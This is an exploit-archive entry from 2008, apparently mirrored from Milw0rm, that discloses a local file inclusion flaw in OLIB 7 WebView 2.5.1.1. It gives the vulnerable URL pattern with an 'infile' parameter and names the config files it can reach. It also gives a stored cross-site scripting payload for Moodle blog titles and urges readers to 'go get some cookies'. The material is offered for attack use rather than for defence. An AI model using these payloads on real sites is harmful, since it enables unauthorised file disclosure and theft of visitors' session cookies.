[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : OLIB 7 WebView 2.5.1.1 (infile) Local File Inclusion Vulnerability
# Published : 2008-10-02
# Author : ZeN
# Previous Title : Bux.to Clone Script Insecure Cookie Handling Vulnerability
# Next Title : OpenX 2.6 (ac.php bannerid) Remote Blind SQL Injection Exploit
Security Advisory for 'OLIB 7 Webview'
This software is apart of Moodle.
Software - OLIB 7 WebView v2.5.1.1
Exploit - LFI
Severity - High
Author - ZeN
website - http://dusecurity.com/
Date - 2nd October 2008
DUSecurity Team / DarkCode
Exploit >
http://olib.site.com/cgi/?session=[session_key]&infile=[LFI]
files in dir - get_settings.ini, setup.ini(contains config file locations), text.ini
Info - You need to login to get a valid session key.
------------------
Extraz :
Moodle Permanent XSS
In Moodle blogging system, simply make a new blog entry with the title
<script>alert()</script>
Now everyone that visits the bloggins system with execute your XSS.
Go get some cookies =D
Enjoy!
------------------
Shouts :-
DUSecurity.com
DarkCode.me
Milw0rm.com
iWannaHack
WL-Group
# www.Syue.com [2008-10-02]